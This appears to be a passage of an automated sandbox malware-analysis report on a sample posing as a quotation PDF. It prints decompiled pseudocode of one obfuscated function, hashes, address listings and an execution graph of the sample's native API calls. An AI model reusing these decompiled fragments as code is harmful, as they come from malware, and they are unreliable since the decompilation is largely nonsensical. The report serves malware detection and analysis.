                                  • Opcode Fuzzy Hash: ad2a8cfca3367af31ed8fccdba65c6857044cb1be902d9aeec9971aaaa20cc2e
                                  • Instruction Fuzzy Hash: 5311BE75504280DFCB42CF54C5C4B19BBA2FB84624F24C6AED8494B696C33AD44ACF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 00774D5B Relevance: 3.7, Instructions: 3703COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 84%
                                  			E00774D5B(signed int __eax, signed char __ebx, signed int __ecx, signed int __edx, intOrPtr* __edi, signed int* __esi, void* __eflags, void* __fp0) {
				signed char _t868;
				signed int _t869;
				intOrPtr* _t871;
				intOrPtr* _t872;
				intOrPtr* _t873;
				signed int _t875;
				signed int _t876;
				signed int _t879;
				signed char _t880;
				intOrPtr* _t882;
				signed char _t883;
				signed char _t884;
				signed char _t885;
				signed char _t886;
				intOrPtr* _t888;
				signed char _t1532;
				signed char _t1534;
				signed char _t1535;
				signed char _t1537;
				intOrPtr* _t1539;
				signed char _t1540;
				signed char _t1541;
				signed char _t1545;
				signed char _t1546;
				signed char _t1547;
				signed char _t1548;
				signed int _t1550;
				signed char _t1551;
				void* _t1552;
				signed char _t1652;
				signed char _t1655;
				signed int* _t1723;
				signed char _t1726;
				intOrPtr* _t1759;
				signed int* _t1772;
				signed int _t1776;
				void* _t1784;
				intOrPtr _t1803;
				void* _t2449;

				_t2449 = __fp0;
				_t1772 = __esi;
				_t1759 = __edi;
				_t1728 = __edx;
				_t1653 = __ecx;
				_t1551 = __ebx;
				_t867 = __eax;
				_push(es);
				if(__eflags < 0) {
					 *__eax =  *__eax + __eax;
					 *__eax =  *__eax + __eax;
					_t1546 = __eax |  *__eax;
					_t1723 = (__ecx |  *(__edi + 0x6a)) +  *_t1546;
					 *_t1546 =  *_t1546 + _t1546;
					 *__edx =  *__edx + _t1723;
					 *__ebx =  *__ebx + __edx;
					 *_t1723 =  *_t1723 ^ _t1546;
					 *_t1723 = _t1723 +  *_t1723;
					 *_t1546 =  *_t1546 + _t1546;
					 *_t1723 =  *_t1723 + _t1546;
					 *_t1546 =  *_t1546 + _t1546;
					asm("adc [eax], eax");
					asm("adc al, 0xa");
					 *__edi =  *__edi + _t1546;
					_t1547 = _t1546 -  *_t1546;
					 *_t1547 =  *_t1547 + _t1547;
					asm("adc esi, [eax]");
					_t1548 = _t1547;
					 *_t1548 =  *_t1548 + _t1548;
					 *__edx =  *__edx + _t1548;
					 *_t1548 =  *_t1548 + _t1548;
					asm("adc [eax], eax");
					 *_t1548 =  *_t1548 ^ _t1548;
					 *__esi =  *__esi + _t1548;
					asm("outsd");
					_t1784 = es;
					 *_t1548 =  *_t1548 + _t1548;
					ss = es;
					_pop(_t1726);
					_t1728 = __edx |  *__esi;
					ss = es;
					_pop(_t1550);
					 *((intOrPtr*)(__ebx + 1)) =  *((intOrPtr*)(__ebx + 1)) - _t1726;
					 *__esi =  *__esi + _t1550;
					_t867 = _t1550 |  *_t1728;
					 *_t867 =  *_t867 - _t1728;
					 *_t867 =  *_t867 + _t867;
					es = es;
					asm("outsd");
					 *_t867 =  *_t867 + _t867;
					 *_t867 =  *_t867 - _t1728;
					 *_t867 =  *_t867 + _t867;
					es = es;
					_t1653 = (_t1726 |  *(_t1728 + _t867)) +  *_t867;
				}
				 *_t867 =  *_t867 - _t1728;
				 *_t867 =  *_t867 + _t867;
				_push(es);
				asm("outsd");
				_t1776 = es;
				 *_t867 =  *_t867 + _t867;
				 *_t867 =  *_t867 + _t867;
				_t868 = _t867 |  *_t867;
				_t1655 = (_t1653 |  *(_t1759 + 0x6b)) +  *_t868;
				 *_t868 =  *_t868 ^ _t868;
				 *_t1772 =  *_t1772 + _t868;
				 *(_t1759 + 0x6b) =  *(_t1759 + 0x6b) | _t1655;
				 *_t868 =  *_t868 + _t868;
				_t869 = _t868 |  *_t868;
				 *_t1772 =  *_t1772 + _t869;
				ss = es;
				 *_t1728 =  *_t1728 + 1;
				_t871 = (_t869 | 0x2ab42d09) +  *[es:ebx];
				 *_t1551 =  *_t1551 - _t1728;
				 *_t871 =  *_t871 + _t871;
				_push(es);
				 *_t1728 =  *_t1728 + _t1655;
				_t872 = _t871 -  *_t1728;
				_push(ss);
				 *_t1728 =  *_t1728 - _t1728;
				 *_t872 =  *_t872 + _t872;
				_push(es);
				 *_t872 =  *_t872 + _t872;
				_t873 = _t872 -  *_t872;
				 *_t873 =  *_t873 + _t873;
				asm("adc esi, [eax]");
				_t875 = _t873 +  *_t873 &  *(_t873 +  *_t873);
				 *_t875 =  *_t875 + _t875;
				_t876 = _t875 &  *_t875;
				 *_t1655 =  *_t1655 + _t1728;
				_t1772[8] = _t1772[8] + _t1551;
				 *_t876 =  *_t876 + _t876;
				 *_t1655 =  *_t1655 + 1;
				_t879 = (_t876 + 0x00000014 |  *_t1772) - 0xc;
				 *((intOrPtr*)(_t1551 + 0x49)) =  *((intOrPtr*)(_t1551 + 0x49)) + _t1728;
				 *_t879 =  *_t879 + _t879;
				_push(es);
				 *_t1551 =  *_t1551 & 0x00000000;
				_t14 = _t879 + _t879;
				 *_t14 =  *((intOrPtr*)(_t879 + _t879)) + _t879;
				if( *_t14 <= 0) {
					L6:
					_t880 = _t879 & 0x280a0000;
					asm("insb");
					 *_t880 =  *_t880 + _t880;
					_t882 = (_t880 |  *_t880) +  *_t1728;
					if(_t882 != 0) {
						goto L10;
					} else {
						 *_t882 =  *_t882 + _t882;
						_t1539 = _t882 + 0x73;
						asm("insd");
						 *_t1539 =  *_t1539 + _t1539;
						_t1652 = _t1551 |  *(_t1776 + 0x24);
						 *_t1539 =  *_t1539 + _t1539;
						_t1540 = _t1539 + 0x2a;
						asm("loop 0x2");
						goto L8;
					}
				} else {
					 *_t879 =  *_t879 + _t879;
					_pop(es);
					_t1551 = _t1551 - _t1728;
					_t1728 = _t1728 +  *((intOrPtr*)(_t1728 + 0x72));
					_t1534 = _t879 + 0x0000000b -  *((intOrPtr*)(_t879 + 0xb)) |  *(_t879 + 0xb -  *((intOrPtr*)(_t879 + 0xb)));
					if(_t1534 < 0) {
						L20:
						asm("outsd");
						if (_t1803 >= 0) goto L21;
						 *_t1728 =  *_t1728 + _t1655;
						 *_t1728 =  *_t1728 + _t1655;
						_t1551 = _t1551 +  *((intOrPtr*)(_t1551 + 0x24));
						 *_t1534 =  *_t1534 + _t1534;
						_t1535 = _t1534 + 0x6f;
						asm("outsb");
						 *_t1535 =  *_t1535 + _t1535;
						_t883 = _t1535 |  *_t1535;
						goto L22;
					} else {
						_t1545 = _t1534 &  *_t1534;
						 *((intOrPtr*)(_t1728 + _t1545)) =  *((intOrPtr*)(_t1728 + _t1545)) + _t1545;
						 *_t1655 =  *_t1655 - _t1551;
						 *_t1545 =  *_t1545 + _t1545;
						_t1540 = _t1545 |  *_t1545;
						 *_t1728 =  *_t1728 + _t1540;
						if( *_t1728 != 0) {
							L8:
							_t1551 = _t1652 +  *((intOrPtr*)(_t1652 + 0x24));
							 *_t1540 =  *_t1540 + _t1540;
							_t1541 = _t1540 + 0x6f;
							asm("outsb");
							 *_t1541 =  *_t1541 + _t1541;
							_t884 = (_t1541 |  *_t1541) +  *_t1551;
							if(_t884 >= 0) {
								L14:
								_t883 = _t884 & 0x00000000;
								 *((intOrPtr*)(_t1728 + _t1776)) =  *((intOrPtr*)(_t1728 + _t1776)) + _t883;
								asm("outsb");
								goto L15;
							} else {
								 *_t884 =  *_t884 + _t884;
								L10:
								_t883 = _t882 + 2;
								if(_t883 != 0) {
									L15:
									 *_t1728 =  *_t1728 + _t883;
									if( *_t1728 != 0) {
										L22:
										 *_t1728 =  *_t1728 + _t1655;
										 *_t1728 =  *_t1728 + 0x14;
										if( *_t1728 >= 0) {
											goto L26;
										} else {
											 *_t883 =  *_t883 + _t883;
											_t1534 = _t883 + 2;
											 *_t1728 =  *_t1728 - _t1728;
											goto L24;
										}
									} else {
										 *_t883 =  *_t883 + _t883;
										_t1534 = _t883 + 3;
										asm("outsd");
										if (_t1534 < 0) goto L17;
										 *_t1728 =  *_t1728 + _t1655;
										 *_t1728 =  *_t1728 + _t1534;
										if( *_t1728 != 0) {
											L24:
											 *_t1534 =  *_t1534 + _t1534;
											_t886 = _t1534 |  *_t1534;
											 *_t1728 =  *_t1728 + _t886;
											 *((intOrPtr*)(_t1776 + 1)) =  *((intOrPtr*)(_t1776 + 1)) - _t1728;
											 *_t1772 =  *_t1772 + _t886;
											 *_t1728 =  *_t1728 + _t886;
											asm("adc al, 0x14");
											 *((intOrPtr*)(_t1551 + 1)) =  *((intOrPtr*)(_t1551 + 1)) - _t1728;
											 *_t1772 =  *_t1772 + _t886;
											 *_t1728 =  *_t1728 + _t1655;
											_push(_t1772);
											 *_t1728 =  *_t1728 + _t886;
											if( *_t1728 == 0) {
												 *_t886 =  *_t886 + _t886;
												_t883 = _t886 + 0xf;
												L26:
												 *_t883 =  *_t883 + _t1776;
												_t1759 = _t1759 + 1;
												 *_t883 =  *_t883 + _t883;
												_t1655 = _t1655 |  *(_t1759 + 0x73);
												 *_t883 =  *_t883 + _t883;
												_t884 = _t883 |  *_t883;
												_t1728 = _t1728 -  *_t1772;
												_t1551 = _t1551 +  *((intOrPtr*)(_t1551 + 0x27));
												goto L27;
											}
										} else {
											 *_t1534 =  *_t1534 + _t1534;
											goto L19;
										}
									}
								} else {
									 *_t883 =  *_t883 + _t883;
									_t1537 = _t883 + 0x0000007e & 0x280a0000;
									asm("insb");
									 *_t1537 =  *_t1537 + _t1537;
									_t1534 = (_t1537 |  *_t1537) +  *_t1728;
									if(_t1534 != 0) {
										L19:
										_t24 = _t1759 + _t1776 * 2;
										 *_t24 =  *((intOrPtr*)(_t1759 + _t1776 * 2)) + _t1534;
										_t1803 =  *_t24;
										goto L20;
									} else {
										 *_t1534 =  *_t1534 + _t1534;
										_t884 = _t1534 + 0x17;
										if(_t884 >= 0) {
											L27:
											asm("daa");
											 *_t884 =  *_t884 + _t884;
											_t885 = _t884 + 0xf;
											 *_t885 =  *_t885 + _t1776;
											_t1759 = _t1759 + 1;
											 *_t885 =  *_t885 + _t885;
											_t1655 = _t1655 |  *(_t1759 + 0x73);
											 *_t885 =  *_t885 + _t885;
											_t886 = _t885 |  *_t885;
											_t1551 = _t1551 -  *_t1772;
										} else {
											 *_t884 =  *_t884 + _t884;
											_t1551 = _t1551 |  *(_t1776 + 0x24);
											goto L14;
										}
									}
								}
							}
						} else {
							 *_t1540 =  *_t1540 + _t1540;
							_t879 = _t1540 + 0x7e;
							goto L6;
						}
					}
				}
				 *_t1728 =  *_t1728 + _t886;
				if( *_t1728 != 0) {
					L33:
					 *_t1728 =  *_t1728 + _t1655;
					 *_t1728 =  *_t1728 + _t1655;
					 *_t886 =  *_t886 + _t886;
					asm("adc esi, [eax]");
					_t888 = _t886 + 1;
					 *_t888 =  *_t888 + _t888;
					 *_t888 =  *_t888 + _t888;
				} else {
					 *_t886 =  *_t886 + _t886;
					_t888 = _t886 + 3;
					asm("outsd");
					if (_t888 >= 0) goto L30;
					 *_t1728 =  *_t1728 + _t1655;
					 *_t1728 =  *_t1728 + _t1655;
					 *[ds:edx] =  *[ds:edx] + _t888;
					if( *[ds:edx] == 0) {
						 *_t888 =  *_t888 + _t888;
						_t1532 = _t888 + 3;
						asm("outsd");
						if (_t1532 >= 0) goto L32;
						 *_t1728 =  *_t1728 + _t1655;
						 *_t1728 =  *_t1728 + _t1655;
						_t1728 = _t1728 - 1;
						 *_t1728 =  *_t1728 + _t1532;
						_push(ss);
						 *((intOrPtr*)(_t1532 + _t1532)) =  *((intOrPtr*)(_t1532 + _t1532)) - _t1728;
						_t886 = (_t1532 |  *_t1532) + 0x17;
						asm("outsd");
						if (_t886 != 0) goto L33;
						goto L33;
					}
				}
				 *_t888 =  *_t888 + _t888;
				 *_t888 =  *_t888 + _t888;
				_t1552 = _t1551 +  *((intOrPtr*)(_t1551 + 0x2a));
			}










































                                  0x00774d5b
                                  0x00774d5b
                                  0x00774d5b
                                  0x00774d5b
                                  0x00774d5b
                                  0x00774d5b
                                  0x00774d5b
                                  0x00774d5b
                                  0x00774d5c
                                  0x00774d5e
                                  0x00774d63
                                  0x00774d65
                                  0x00774d67
                                  0x00774d6a
                                  0x00774d6d
                                  0x00774d6f
                                  0x00774d71
                                  0x00774d73
                                  0x00774d75
                                  0x00774d77
                                  0x00774d79
                                  0x00774d7b
                                  0x00774d7d
                                  0x00774d82
                                  0x00774d84
                                  0x00774d86
                                  0x00774d88
                                  0x00774d8a
                                  0x00774d8d
                                  0x00774d8f
                                  0x00774d91
                                  0x00774d93
                                  0x00774d97
                                  0x00774d99
                                  0x00774d9b
                                  0x00774d9c
                                  0x00774d9d
                                  0x00774da5
                                  0x00774da6
                                  0x00774da7
                                  0x00774daa
                                  0x00774dab
                                  0x00774dac
                                  0x00774daf
                                  0x00774db1
                                  0x00774db3
                                  0x00774db5
                                  0x00774db8
                                  0x00774db9
                                  0x00774dbb
                                  0x00774dc0
                                  0x00774dc2
                                  0x00774dc5
                                  0x00774dc6
                                  0x00774dc6
                                  0x00774dc7
                                  0x00774dc9
                                  0x00774dcb
                                  0x00774dcd
                                  0x00774dce
                                  0x00774dcf
                                  0x00774dd4
                                  0x00774dd6
                                  0x00774dd8
                                  0x00774dda
                                  0x00774ddc
                                  0x00774ddf
                                  0x00774de2
                                  0x00774de4
                                  0x00774de6
                                  0x00774de8
                                  0x00774de9
                                  0x00774df0
                                  0x00774df3
                                  0x00774df5
                                  0x00774df7
                                  0x00774df8
                                  0x00774dfa
                                  0x00774dfc
                                  0x00774dfd
                                  0x00774dff
                                  0x00774e01
                                  0x00774e02
                                  0x00774e04
                                  0x00774e06
                                  0x00774e08
                                  0x00774e0c
                                  0x00774e0e
                                  0x00774e10
                                  0x00774e12
                                  0x00774e14
                                  0x00774e17
                                  0x00774e1b
                                  0x00774e1f
                                  0x00774e21
                                  0x00774e24
                                  0x00774e26
                                  0x00774e27
                                  0x00774e2a
                                  0x00774e2a
                                  0x00774e2d
                                  0x00774e52
                                  0x00774e52
                                  0x00774e57
                                  0x00774e58
                                  0x00774e5c
                                  0x00774e5e
                                  0x00000000
                                  0x00774e60
                                  0x00774e60
                                  0x00774e62
                                  0x00774e64
                                  0x00774e65
                                  0x00774e67
                                  0x00774e6a
                                  0x00774e6c
                                  0x00774e6e
                                  0x00000000
                                  0x00774e6e
                                  0x00774e2f
                                  0x00774e2f
                                  0x00774e35
                                  0x00774e36
                                  0x00774e38
                                  0x00774e3b
                                  0x00774e3d
                                  0x00774ebc
                                  0x00774ebc
                                  0x00774ebd
                                  0x00774ebf
                                  0x00774ec1
                                  0x00774ec5
                                  0x00774ec8
                                  0x00774eca
                                  0x00774ecc
                                  0x00774ecd
                                  0x00774ecf
                                  0x00000000
                                  0x00774e3f
                                  0x00774e3f
                                  0x00774e41
                                  0x00774e44
                                  0x00774e46
                                  0x00774e48
                                  0x00774e4a
                                  0x00774e4c
                                  0x00774e70
                                  0x00774e70
                                  0x00774e73
                                  0x00774e75
                                  0x00774e77
                                  0x00774e78
                                  0x00774e7c
                                  0x00774e7e
                                  0x00774ea2
                                  0x00774ea2
                                  0x00774ea4
                                  0x00774ea7
                                  0x00000000
                                  0x00774e80
                                  0x00774e80
                                  0x00774e82
                                  0x00774e82
                                  0x00774e84
                                  0x00774ea8
                                  0x00774ea8
                                  0x00774eaa
                                  0x00774ed0
                                  0x00774ed0
                                  0x00774ed2
                                  0x00774ed5
                                  0x00000000
                                  0x00774ed7
                                  0x00774ed7
                                  0x00774ed9
                                  0x00774edb
                                  0x00000000
                                  0x00774edb
                                  0x00774eac
                                  0x00774eac
                                  0x00774eae
                                  0x00774eb0
                                  0x00774eb1
                                  0x00774eb3
                                  0x00774eb5
                                  0x00774eb7
                                  0x00774edd
                                  0x00774edd
                                  0x00774edf
                                  0x00774ee1
                                  0x00774ee3
                                  0x00774ee6
                                  0x00774ee8
                                  0x00774eea
                                  0x00774eec
                                  0x00774eef
                                  0x00774ef1
                                  0x00774ef3
                                  0x00774ef4
                                  0x00774ef6
                                  0x00774ef8
                                  0x00774efa
                                  0x00774efc
                                  0x00774efc
                                  0x00774efe
                                  0x00774eff
                                  0x00774f01
                                  0x00774f04
                                  0x00774f06
                                  0x00774f08
                                  0x00774f0b
                                  0x00000000
                                  0x00774f0b
                                  0x00774eb9
                                  0x00774eb9
                                  0x00000000
                                  0x00774eb9
                                  0x00774eb7
                                  0x00774e86
                                  0x00774e86
                                  0x00774e8a
                                  0x00774e8f
                                  0x00774e90
                                  0x00774e94
                                  0x00774e96
                                  0x00774eba
                                  0x00774eba
                                  0x00774eba
                                  0x00774eba
                                  0x00000000
                                  0x00774e98
                                  0x00774e98
                                  0x00774e9a
                                  0x00774e9c
                                  0x00774f0d
                                  0x00774f0d
                                  0x00774f0e
                                  0x00774f10
                                  0x00774f12
                                  0x00774f14
                                  0x00774f15
                                  0x00774f17
                                  0x00774f1a
                                  0x00774f1c
                                  0x00774f1e
                                  0x00774e9e
                                  0x00774e9e
                                  0x00774ea0
                                  0x00000000
                                  0x00774ea0
                                  0x00774e9c
                                  0x00774e96
                                  0x00774e84
                                  0x00774e4e
                                  0x00774e4e
                                  0x00774e50
                                  0x00000000
                                  0x00774e50
                                  0x00774e4c
                                  0x00774e3d
                                  0x00774f20
                                  0x00774f22
                                  0x00774f4e
                                  0x00774f4e
                                  0x00774f50
                                  0x00774f52
                                  0x00774f54
                                  0x00774f58
                                  0x00774f5a
                                  0x00774f5c
                                  0x00774f24
                                  0x00774f24
                                  0x00774f26
                                  0x00774f28
                                  0x00774f29
                                  0x00774f2b
                                  0x00774f2d
                                  0x00774f2f
                                  0x00774f32
                                  0x00774f34
                                  0x00774f36
                                  0x00774f38
                                  0x00774f39
                                  0x00774f3b
                                  0x00774f3d
                                  0x00774f3f
                                  0x00774f40
                                  0x00774f42
                                  0x00774f43
                                  0x00774f49
                                  0x00774f4b
                                  0x00774f4c
                                  0x00000000
                                  0x00774f4c
                                  0x00774f32
                                  0x00774f5d
                                  0x00774f5f
                                  0x00774f61

                                  Memory Dump Source
                                  • Source File: 00000001.00000002.744641420.0000000000772000.00000002.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                  • Associated: 00000001.00000002.744629852.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.744721256.00000000007F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_770000_QUOTATION PDF_SCAN_COPY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3f109ae353d2784a41d91fa8440c067d05b3bf8caa02aa820131f09f20626bb0
                                  • Instruction ID: a846fa83435d2c8d7d06c5c636b4bedec9a74f1995d2f05be431bdc3f0185373
                                  • Opcode Fuzzy Hash: 3f109ae353d2784a41d91fa8440c067d05b3bf8caa02aa820131f09f20626bb0
                                  • Instruction Fuzzy Hash: 3B63FF9150EBC29FDB034B785CB12A1BFB19D6325435E98C7C4C4CF0A7E24859AEE726
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0116C254 Relevance: .3, Instructions: 265COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.745354782.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_1160000_QUOTATION PDF_SCAN_COPY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 08a433b944e7509406976af695cd49c64e93cc0548b1a6b997481a934ddbc297
                                  • Instruction ID: 18954560e17789fe0831f088056fe662f4b4f5acc980c7b475f75223fbb8631d
                                  • Opcode Fuzzy Hash: 08a433b944e7509406976af695cd49c64e93cc0548b1a6b997481a934ddbc297
                                  • Instruction Fuzzy Hash: F5A19232E0021A8FCF09DFB5D8445DEBBB6FF85304B15816AE915BB225EB31A955CF80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:6.6%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:3%
                                  Total number of Nodes:663
                                  Total number of Limit Nodes:76
                                  execution_graph 18111 41f1a0 18112 41f1ab 18111->18112 18114 41b960 18111->18114 18115 41b986 18114->18115 18122 409d30 18115->18122 18117 41b992 18118 41b9b3 18117->18118 18130 40c1b0 18117->18130 18118->18112 18120 41b9a5 18166 41a6a0 18120->18166 18123 409d3d 18122->18123 18169 409c80 18122->18169 18125 409d44 18123->18125 18183 409c20 18123->18183 18125->18117 18131 40c1d5 18130->18131 18692 40b1b0 18131->18692 18133 40c22c 18696 40ae30 18133->18696 18135 40c4a3 18135->18120 18136 40c252 18136->18135 18705 414390 18136->18705 18138 40c297 18138->18135 18708 408a60 18138->18708 18140 40c2db 18140->18135 18715 41a4f0 18140->18715 18144 40c331 18145 40c338 18144->18145 18147 41a000 LdrLoadDll 18144->18147 18146 41bdb0 2 API calls 18145->18146 18149 40c345 18146->18149 18148 40c375 18147->18148 18150 40c382 18148->18150 18153 40c392 18148->18153 18149->18120 18151 41bdb0 2 API calls 18150->18151 18152 40c389 18151->18152 18152->18120 18154 40f490 LdrLoadDll 18153->18154 18155 40c406 18154->18155 18155->18145 18156 40c411 18155->18156 18157 41bdb0 2 API calls 18156->18157 18158 40c435 18157->18158 18725 41a050 18158->18725 18161 41a000 LdrLoadDll 18162 40c470 18161->18162 18162->18135 18728 419e10 18162->18728 18165 41a6a0 2 API calls 18165->18135 18167 41a6bf ExitProcess 18166->18167 18168 41af50 LdrLoadDll 18166->18168 18168->18167 18170 409c93 18169->18170 18222 418bb0 18169->18222 18202 418a60 18170->18202 18173 409ca6 18173->18123 18174 409c9c 18174->18173 18205 41b2a0 18174->18205 18176 409ce3 18176->18173 18216 409aa0 18176->18216 18178 409d03 18226 409620 18178->18226 18180 409d15 18230 407d70 18180->18230 18182 409d1b 18182->18123 18184 409c3a 18183->18184 18185 41b590 LdrLoadDll 18183->18185 18186 409c4b 18184->18186 18187 41b590 LdrLoadDll 18184->18187 18185->18184 18675 41b590 18186->18675 18187->18186 18190 40f170 18191 40f189 18190->18191 18679 40b030 18191->18679 18193 40f19c 18683 41a1d0 18193->18683 18197 40f1c2 18200 40f1ed 18197->18200 18689 41a250 18197->18689 18199 41a480 2 API calls 18201 409d55 18199->18201 18200->18199 18201->18117 18237 41a5f0 18202->18237 18206 41b2b9 18205->18206 18276 414a40 18206->18276 18208 41b2d1 18209 41b2da 18208->18209 18315 41b0e0 18208->18315 18209->18176 18211 41b2ee 18211->18209 18333 419ef0 18211->18333 18641 407ea0 18216->18641 18218 409ac1 18218->18178 18219 409aba 18219->18218 18654 408160 18219->18654 18223 418bbf 18222->18223 18224 414e40 LdrLoadDll 18223->18224 18225 418bfd 18224->18225 18225->18170 18227 409648 18226->18227 18660 40af00 18227->18660 18229 40967e 18229->18180 18231 407da9 18230->18231 18232 407d7c 18230->18232 18231->18182 18232->18231 18233 414a40 6 API calls 18232->18233 18234 407e36 18233->18234 18236 407e62 18234->18236 18667 41be90 18234->18667 18236->18182 18240 41af50 18237->18240 18239 418a75 18239->18174 18241 41af60 18240->18241 18243 41af82 18240->18243 18244 414e40 18241->18244 18243->18239 18245 414e4e 18244->18245 18247 414e5a 18244->18247 18245->18247 18249 4152c0 18245->18249 18247->18243 18254 414fc0 18249->18254 18251 4152d8 18252 414e40 LdrLoadDll 18251->18252 18253 414fac 18251->18253 18252->18253 18253->18243 18255 414fe5 18254->18255 18256 415054 18255->18256 18268 40ace0 18255->18268 18256->18251 18258 415086 18260 41512b 18258->18260 18272 41c050 18258->18272 18260->18251 18262 415191 18262->18260 18263 4152c0 LdrLoadDll 18262->18263 18265 4151c3 18263->18265 18264 415124 18264->18260 18266 4152c0 LdrLoadDll 18264->18266 18265->18251 18267 415187 18266->18267 18267->18251 18269 40ad04 18268->18269 18270 40ad40 LdrLoadDll 18269->18270 18271 40ad0b 18269->18271 18270->18271 18271->18258 18273 41c060 18272->18273 18275 4150cd 18272->18275 18274 414e40 LdrLoadDll 18273->18274 18274->18275 18275->18260 18275->18262 18275->18264 18277 414d75 18276->18277 18287 414a54 18276->18287 18277->18208 18280 414b80 18342 41a350 18280->18342 18281 414b63 18399 41a450 18281->18399 18284 414b6d 18284->18208 18285 414ba7 18286 41bdb0 2 API calls 18285->18286 18289 414bb3 18286->18289 18287->18277 18339 419c40 18287->18339 18288 414d39 18291 41a480 2 API calls 18288->18291 18289->18284 18289->18288 18290 414d4f 18289->18290 18295 414c42 18289->18295 18424 414780 18290->18424 18292 414d40 18291->18292 18292->18208 18294 414d62 18294->18208 18296 414ca9 18295->18296 18298 414c51 18295->18298 18296->18288 18297 414cbc 18296->18297 18415 41a2d0 18297->18415 18300 414c56 18298->18300 18301 414c6a 18298->18301 18402 414640 18300->18402 18302 414c87 18301->18302 18303 414c6f 18301->18303 18302->18292 18357 414400 18302->18357 18345 4146e0 18303->18345 18306 414c60 18306->18208 18309 414c7d 18309->18208 18313 414c9f 18313->18208 18314 414d28 18314->18208 18316 41b0f1 18315->18316 18317 41b103 18316->18317 18488 41bd30 18316->18488 18317->18211 18319 41b124 18491 414060 18319->18491 18321 41b170 18321->18211 18322 41b147 18322->18321 18323 414060 3 API calls 18322->18323 18326 41b169 18323->18326 18325 41b1fa 18327 41b20a 18325->18327 18608 41aef0 18325->18608 18326->18321 18516 415380 18326->18516 18526 41ad60 18327->18526 18330 41b238 18605 419eb0 18330->18605 18334 419f0c 18333->18334 18335 41af50 LdrLoadDll 18333->18335 18336 41bdb0 18334->18336 18335->18334 18337 41b349 18336->18337 18638 41a660 18336->18638 18337->18176 18340 41af50 LdrLoadDll 18339->18340 18341 414b34 18340->18341 18341->18280 18341->18281 18341->18284 18343 41a36c NtCreateFile 18342->18343 18344 41af50 LdrLoadDll 18342->18344 18343->18285 18344->18343 18346 4146fc 18345->18346 18347 41a2d0 LdrLoadDll 18346->18347 18348 41471d 18347->18348 18349 414724 18348->18349 18350 414738 18348->18350 18351 41a480 2 API calls 18349->18351 18352 41a480 2 API calls 18350->18352 18353 41472d 18351->18353 18354 414741 18352->18354 18353->18309 18459 41bfc0 18354->18459 18356 41474c 18356->18309 18358 41444b 18357->18358 18359 41447e 18357->18359 18361 41a2d0 LdrLoadDll 18358->18361 18360 4145c9 18359->18360 18364 41449a 18359->18364 18363 41a2d0 LdrLoadDll 18360->18363 18362 414466 18361->18362 18365 41a480 2 API calls 18362->18365 18369 4145e4 18363->18369 18366 41a2d0 LdrLoadDll 18364->18366 18367 41446f 18365->18367 18368 4144b5 18366->18368 18367->18313 18371 4144d1 18368->18371 18372 4144bc 18368->18372 18370 41a310 LdrLoadDll 18369->18370 18373 41461e 18370->18373 18375 4144d6 18371->18375 18376 4144ec 18371->18376 18374 41a480 2 API calls 18372->18374 18377 41a480 2 API calls 18373->18377 18378 4144c5 18374->18378 18379 41a480 2 API calls 18375->18379 18385 4144f1 18376->18385 18465 41bf80 18376->18465 18381 414629 18377->18381 18378->18313 18382 4144df 18379->18382 18380 414503 18380->18313 18381->18313 18382->18313 18385->18380 18468 41a400 18385->18468 18386 414557 18392 41456e 18386->18392 18476 41a290 18386->18476 18387 414575 18390 41a480 2 API calls 18387->18390 18388 41458a 18391 41a480 2 API calls 18388->18391 18390->18380 18393 414593 18391->18393 18392->18387 18392->18388 18394 4145bf 18393->18394 18471 41bb80 18393->18471 18394->18313 18396 4145aa 18397 41bdb0 2 API calls 18396->18397 18398 4145b3 18397->18398 18398->18313 18400 41af50 LdrLoadDll 18399->18400 18401 41a46c 18400->18401 18401->18284 18479 419fb0 18402->18479 18405 414684 18407 41a480 2 API calls 18405->18407 18406 414698 18482 41a000 18406->18482 18409 41468d 18407->18409 18409->18306 18411 41a480 2 API calls 18412 4146c2 18411->18412 18413 41a480 2 API calls 18412->18413 18414 4146cc 18413->18414 18414->18306 18416 41af50 LdrLoadDll 18415->18416 18417 414d04 18416->18417 18418 41a310 18417->18418 18419 414d1c 18418->18419 18420 41af50 LdrLoadDll 18418->18420 18421 41a480 18419->18421 18420->18419 18422 41af50 LdrLoadDll 18421->18422 18423 41a49c NtClose 18422->18423 18423->18314 18425 414796 18424->18425 18426 41a2d0 LdrLoadDll 18425->18426 18427 4147be 18426->18427 18428 4147c7 18427->18428 18429 4147dc 18427->18429 18430 41a480 2 API calls 18428->18430 18431 414800 18429->18431 18432 41484a 18429->18432 18442 4147d0 18430->18442 18485 41a3b0 18431->18485 18433 414890 18432->18433 18434 41484f 18432->18434 18438 4148a2 18433->18438 18444 4149ca 18433->18444 18437 41a400 2 API calls 18434->18437 18434->18442 18440 41487a 18437->18440 18441 4148a7 18438->18441 18453 4148e2 18438->18453 18439 41a480 2 API calls 18439->18442 18443 41a480 2 API calls 18440->18443 18445 41a3b0 LdrLoadDll 18441->18445 18442->18294 18446 414883 18443->18446 18444->18442 18448 41a400 2 API calls 18444->18448 18447 4148ca 18445->18447 18446->18294 18449 41a480 2 API calls 18447->18449 18452 414a21 18448->18452 18450 4148d3 18449->18450 18450->18294 18451 41a3b0 LdrLoadDll 18454 41490a 18451->18454 18455 41a480 2 API calls 18452->18455 18453->18442 18453->18451 18456 41a480 2 API calls 18454->18456 18457 414a2a 18455->18457 18458 414915 18456->18458 18457->18294 18458->18294 18462 41a620 18459->18462 18461 41bfda 18461->18356 18463 41af50 LdrLoadDll 18462->18463 18464 41a63c RtlAllocateHeap 18463->18464 18464->18461 18466 41a620 2 API calls 18465->18466 18467 